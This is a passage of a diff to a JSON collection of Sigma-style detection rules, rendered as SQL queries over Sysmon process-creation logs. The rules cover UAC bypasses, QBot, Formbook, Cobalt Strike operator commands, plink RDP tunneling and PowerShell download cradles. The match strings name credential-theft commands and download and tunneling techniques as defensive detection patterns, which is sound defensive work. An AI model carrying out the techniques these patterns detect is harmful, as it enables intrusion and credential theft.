'%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "status": "test", + "description": "Execution of plink to perform data exfiltration and tunneling", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\')) AND NOT ((Image = '') OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image IN ('-', '')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (Image LIKE '%.scr' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_plink_susp_tunneling.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "status": "test", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate setups that use similar flags" + "Administrative activity", + "Software installation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "status": "experimental", - "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "status": "test", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { "title": "Suspicious Rundll32 Invoking Inline VBScript", @@ -11241,1218 +10891,1209 @@ "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.003" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "title": "Rundll32 Registered COM Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "load malicious registered COM objects", + "author": "frack113", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1574", + "attack.execution" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", - "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "status": "test", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1218" + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of cmstp.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by QBot", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_malware_qbot.yml" + }, + { + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.002" + "attack.t1564.004" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "title": "HackTool - Htran/NATBypass Execution", + "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "status": "experimental", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE 